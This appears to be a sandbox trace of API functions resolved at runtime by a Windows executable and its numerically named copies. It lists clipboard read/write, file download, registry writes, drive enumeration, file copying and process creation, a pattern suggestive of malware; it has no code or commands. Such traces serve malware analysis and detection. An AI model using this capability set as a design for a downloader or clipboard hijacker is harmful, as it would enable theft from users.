DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/isalpha
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/wcsstr
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: msvcrt.dll/isdigit
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/memcpy
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenUrlW
DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: USER32.dll/OpenClipboard
DynamicLoader: USER32.dll/EmptyClipboard
DynamicLoader: USER32.dll/GetClipboardData
DynamicLoader: USER32.dll/CloseClipboard
DynamicLoader: USER32.dll/SetClipboardData
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: 1495120250.exe/atexit
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/isalpha
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/wcsstr
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: msvcrt.dll/isdigit
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/memcpy
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenUrlW
DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: USER32.dll/OpenClipboard
DynamicLoader: USER32.dll/EmptyClipboard
DynamicLoader: USER32.dll/GetClipboardData
DynamicLoader: USER32.dll/CloseClipboard
DynamicLoader: USER32.dll/SetClipboardData
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: 2080821079.exe/atexit
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
